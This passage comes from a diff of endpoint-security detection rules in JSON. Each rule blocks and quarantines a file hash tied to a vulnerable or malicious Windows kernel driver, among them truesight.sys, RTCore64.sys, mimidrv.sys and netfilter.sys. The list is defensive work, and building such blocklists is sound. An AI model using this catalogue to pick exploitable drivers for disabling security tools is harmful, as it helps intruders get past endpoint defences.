"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142362Z", + "creation_date": "2026-03-23T11:45:31.142364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a12541f2b5689d8270552a397e45522eb2638a08235540db197872d264caf597", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80cdbc9f-b575-5b57-bdd0-50b616204d09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157257Z", + "creation_date": "2026-03-23T11:45:31.157259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "acc7c9347635ea9b1e449696ba6ee06134781aa7a8a12d1b492c51afd3385bce", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80d3836f-985c-5d5d-86c5-19870f8abf00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983999Z", + "creation_date": "2026-03-23T11:45:29.984001Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492", + "comment": "Vulnerable Kernel Driver (aka msrhook.sys) [https://www.loldrivers.io/drivers/1a1cf88a-96d0-46cd-a24d-1535e4a5f6e3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80db9ef8-8229-5987-a447-daf1e8421fcc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976336Z", + 
"creation_date": "2026-03-23T11:45:29.976338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80dbe0fe-d855-5e9a-96f0-d4e9f4cd4fda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834928Z", + "creation_date": "2026-03-23T11:45:30.834931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834940Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "237f79d4c8784776469b41378698f855c26e20f363ddffbed5e55f978110a8f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} 
+{ + "id": "80f65a26-e347-547b-92a8-21b3e7c53ce0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967456Z", + "creation_date": "2026-03-23T11:45:29.967458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80fb12ff-e6fa-5515-abb4-4859adcd5861", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984906Z", + "creation_date": "2026-03-23T11:45:29.984908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.984913Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "810f4c65-b5ee-5fa9-a79e-a5095447766c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143918Z", + "creation_date": "2026-03-23T11:45:32.143920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a490a57a8f57ae27571629197bb652b0f4c84f9414d09bf6cfe2ee1b175101b4", + "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "811b3a74-d768-5f61-baa1-75ed8525f0be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607685Z", + "creation_date": "2026-03-23T11:45:29.607687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f5dc63e5742096e4accaca39ae77a2a2142b438c10f97860dee4054b51d3b35", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "811dd858-c6e4-5fd1-aa2d-c3975c507389", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480729Z", + "creation_date": "2026-03-23T11:45:31.480733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0ebb1a48c4eb16cd6213898edeb48d00a0c0fe1884b204f6b56dd9f4356f7bf8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8125580b-1172-57ea-af15-c325cb5ef891", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818737Z", + "creation_date": "2026-03-23T11:45:31.818741Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e510d0ef684a52cf4871520cb9ac2c4d289d0717ba9bd3a33739aab433b252b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "813d3e30-0f9e-5d35-a841-8fbf23a5a12e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.161057Z", + "creation_date": "2026-03-23T11:45:31.161059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.161065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fc7b3f9ed8b3b21684d8691d5c4486bc6e39dabca6f293ae2205cd647e8793f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "814bdd15-d6e6-5f47-b863-1552fb334b95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970529Z", + "creation_date": "2026-03-23T11:45:29.970531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2456a7921fa8ab7b9779e5665e6b42fccc019feb9e49a9a28a33ec0a4bb323c4", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) 
[https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8154ed8d-78d0-5e50-b64e-f71e82d1e39c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976588Z", + "creation_date": "2026-03-23T11:45:29.976590Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29bf8618816bce5fa2845409d98b7b96915e0763bb04719535ca885e4713cfaf", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "81572d04-d2a4-5e42-98a2-71372cc5a680", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155345Z", + "creation_date": "2026-03-23T11:45:31.155347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155353Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01423a32ba9f1f1a6652104b4123420ca0f63c0a5ad74f69e53aa553360f86c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "81577f0e-291a-5ef4-a6fe-625027aed9a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484087Z", + "creation_date": 
"2026-03-23T11:45:31.484092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484100Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c67887a7bc5ae3d94cafa31901e8fcf3e2f0d2ecb33f6639066588bd721e9d2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8168b6b5-2944-53a0-8947-77355df1d3dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455473Z", + "creation_date": "2026-03-23T11:45:30.455476Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e9e9e0b9a23deec5f28dc45f0bbe7423565f037f74be2957e82e5f72c886094", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "816b1a64-668e-5a57-ac77-e38a9ff15280", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980734Z", + "creation_date": "2026-03-23T11:45:29.980736Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980741Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aab97fb324c883f1de71112e1d9fb716cef40636e39a3b9f4a5b8678cf7bde3f", + "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "816bcbb4-3406-5e44-a44a-3bd00ab98b2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142238Z", + "creation_date": "2026-03-23T11:45:31.142240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142245Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7755e3bdac09106370c5676a332bf800f5790d0cf1cfc58c634127630a08f045", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "818a71b5-49cd-5e4a-b4c3-112d9eefa02a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818613Z", + "creation_date": "2026-03-23T11:45:30.818615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "33bc9a17a0909e32a3ae7e6f089b7f050591dd6f3f7a8172575606bec01889ef", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8194e364-2d52-5277-9444-20364437d672", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146528Z",
+ "creation_date": "2026-03-23T11:45:31.146531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "206264f6d4f14ca8e4f721c5f954d78c8f23546afafd3f6542e23c86fdffc572",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "819b1411-f51b-5f15-9299-e19e41ec8fd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975535Z",
+ "creation_date": "2026-03-23T11:45:29.975537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b37b3c6877b70289c0f43aeb71349f7344b06063996e6347c3c18d8c5de77f3b",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "819c4ced-872c-5689-808a-2138d989a314",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831344Z",
+ "creation_date": "2026-03-23T11:45:30.831347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "868a5cbf26acfa167dc582dee9e8b9449b708a2242ddb2f858f079dcb897f5ab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81a05c2c-15d3-5275-a79a-bbf3b83913ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465892Z",
+ "creation_date": "2026-03-23T11:45:30.465896Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "704c6ffe786bc83a73fbdcd2edd50f47c3b5053da7da6aa4c10324d389a31db4",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "81a9fb1d-f1fe-527f-bc77-48da8dcc0e20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816499Z",
+ "creation_date": "2026-03-23T11:45:31.816502Z",
+ "enabled": true,
+ "block_on_agent": true,
